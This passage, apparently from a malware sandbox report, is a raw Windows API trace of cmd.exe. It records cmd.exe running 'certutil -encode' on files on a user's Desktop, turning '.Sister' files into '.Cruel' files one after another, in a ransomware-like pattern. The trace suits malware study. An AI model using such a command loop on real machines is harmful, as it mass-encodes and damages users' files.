lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d6a960*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0257.907] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\" ") returned 72 [0257.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0257.907] GetFileType (hFile=0x50) returned 0x2 [0257.907] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0257.907] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0258.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0258.019] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x48) returned 1 [0258.127] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0258.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0258.127] GetFileType (hFile=0x50) returned 0x2 [0258.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0258.127] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0258.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0258.211] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0258.289] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0258.359] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0258.359] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0258.359] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0258.359] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0258.359] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0258.359] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0258.359] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0258.359] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0258.359] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0258.359] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0258.359] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0258.359] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0258.359] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0258.359] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0258.359] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0258.359] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0258.359] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0258.360] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0258.360] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0258.360] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0258.360] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0258.360] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0258.360] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0258.360] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0258.360] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0258.360] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0258.360] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0258.360] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0258.360] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0258.360] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0258.360] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0258.360] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0258.360] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0258.360] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0258.360] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0258.360] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0258.360] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0258.360] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0258.360] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0258.360] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0258.360] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0258.360] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0258.361] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0258.361] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0258.361] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0258.361] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0258.361] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0258.361] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0258.361] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0258.361] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0258.361] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0258.361] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0258.361] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0258.361] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0258.361] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0258.361] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0258.361] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0258.361] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0258.361] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0258.361] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0258.361] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0258.361] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0258.361] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0258.361] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0258.361] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0258.361] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0258.361] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0258.361] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0258.362] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0258.362] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0258.362] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0258.362] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0258.362] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0258.362] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0258.362] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0258.362] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0258.362] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0258.362] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0258.362] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0258.362] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0258.362] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0258.362] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0258.362] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0258.362] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0258.362] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0258.362] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0258.362] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0258.362] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0258.362] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0258.362] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0258.362] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0258.363] ??_V@YAXPEAX@Z () returned 0x1 [0258.363] GetProcessHeap () returned 0x21ed8c70000 [0258.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93b0d60 [0258.363] GetProcessHeap () returned 0x21ed8c70000 [0258.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb2) returned 0x21ed8c96040 [0258.363] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0258.363] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0258.363] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0258.363] GetProcessHeap () returned 0x21ed8c70000 [0258.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93c0d50 [0258.366] SetErrorMode (uMode=0x0) returned 0x0 [0258.366] SetErrorMode (uMode=0x1) returned 0x0 [0258.366] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93c0d60, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0258.366] SetErrorMode (uMode=0x0) returned 0x1 [0258.366] GetProcessHeap () returned 0x21ed8c70000 [0258.366] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93c0d50, Size=0x52) returned 0x21ed93c0d50 [0258.366] GetProcessHeap () returned 0x21ed8c70000 [0258.366] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93c0d50) returned 0x52 [0258.366] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0258.366] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0258.366] GetProcessHeap () returned 0x21ed8c70000 [0258.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937c760 [0258.366] GetProcessHeap () returned 0x21ed8c70000 [0258.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8cc8240 [0258.366] GetProcessHeap () returned 0x21ed8c70000 [0258.366] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8240, Size=0x1be) returned 0x21ed8cc8240 [0258.366] GetProcessHeap () returned 0x21ed8c70000 [0258.366] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc8240) returned 0x1be [0258.367] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0258.367] GetProcessHeap () returned 0x21ed8c70000 [0258.367] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed9980ab0 [0258.367] GetProcessHeap () returned 0x21ed8c70000 [0258.367] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980ab0, Size=0x7e) returned 0x21ed9980ab0 [0258.367] GetProcessHeap () returned 0x21ed8c70000 [0258.367] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980ab0) returned 0x7e [0258.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0258.367] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0258.368] GetLastError () returned 0x2 [0258.368] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0258.368] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0258.368] GetLastError () returned 0x2 [0258.368] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0258.368] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0258.368] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0258.369] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0258.369] GetLastError () returned 0x2 [0258.369] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0258.369] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0258.369] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0258.369] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0258.369] ??_V@YAXPEAX@Z () returned 0x1 [0258.369] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0258.474] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0258.474] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0258.475] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0258.475] GetProcessHeap () returned 0x21ed8c70000 [0258.475] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45ce0 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0258.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0258.476] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0258.476] GetProcessHeap () returned 0x21ed8c70000 [0258.476] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45ce0) returned 1 [0258.476] GetProcessHeap () returned 0x21ed8c70000 [0258.476] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95c00 [0258.476] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0258.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0258.510] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0258.577] _get_osfhandle (_FileHandle=0) returned 0x4c [0258.577] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0258.645] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1248, dwThreadId=0xe34)) returned 1 [0258.659] CloseHandle (hObject=0xa8) returned 1 [0258.659] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0258.659] GetProcessHeap () returned 0x21ed8c70000 [0258.659] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0258.659] GetEnvironmentStringsW () returned 0x21ed8d44660* [0258.659] GetProcessHeap () returned 0x21ed8c70000 [0258.659] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0258.659] FreeEnvironmentStringsA (penv="=") returned 1 [0258.659] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0260.705] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0260.705] CloseHandle (hObject=0xa4) returned 1 [0260.705] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0260.705] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0260.705] GetProcessHeap () returned 0x21ed8c70000 [0260.706] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0260.706] GetEnvironmentStringsW () returned 0x21ed8d44660* [0260.706] GetProcessHeap () returned 0x21ed8c70000 [0260.706] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0260.706] FreeEnvironmentStringsA (penv="=") returned 1 [0260.706] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0260.706] GetProcessHeap () returned 0x21ed8c70000 [0260.706] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0260.706] GetEnvironmentStringsW () returned 0x21ed8d44660* [0260.706] GetProcessHeap () returned 0x21ed8c70000 [0260.706] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0260.706] FreeEnvironmentStringsA (penv="=") returned 1 [0260.706] GetProcessHeap () returned 0x21ed8c70000 [0260.707] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95c00) returned 1 [0260.707] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0260.707] ??_V@YAXPEAX@Z () returned 0x1 [0260.707] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe895cef0, ftCreationTime.dwHighDateTime=0x1d5ee1a, ftLastAccessTime.dwLowDateTime=0x7dd32d20, ftLastAccessTime.dwHighDateTime=0x1d5e43c, ftLastWriteTime.dwLowDateTime=0x7dd32d20, ftLastWriteTime.dwHighDateTime=0x1d5e43c, nFileSizeHigh=0x0, nFileSizeLow=0xdded, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="VOv-CkMzVt4YRw.odp.Sister", cAlternateFileName="")) returned 1 [0260.707] GetProcessHeap () returned 0x21ed8c70000 [0260.707] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0130, Size=0x5b6) returned 0x21ed93b0130 [0260.707] GetProcessHeap () returned 0x21ed8c70000 [0260.707] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0130) returned 0x5b6 [0260.707] GetProcessHeap () returned 0x21ed8c70000 [0260.707] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6ac20 [0260.707] GetProcessHeap () returned 0x21ed8c70000 [0260.707] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ac20, Size=0x58) returned 0x21ed8d6ac20 [0260.707] GetProcessHeap () returned 0x21ed8c70000 [0260.708] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6ac20) returned 0x58 [0260.708] GetProcessHeap () returned 0x21ed8c70000 [0260.708] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6ac90 [0260.708] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0260.708] GetProcessHeap () returned 0x21ed8c70000 [0260.708] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8cc7ab0 [0260.708] ??_V@YAXPEAX@Z () returned 0x1 [0260.708] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0260.708] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca60 [0260.708] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0260.709] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0260.709] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0260.709] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc58b6a35, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc58b6a35, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0260.709] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0260.709] 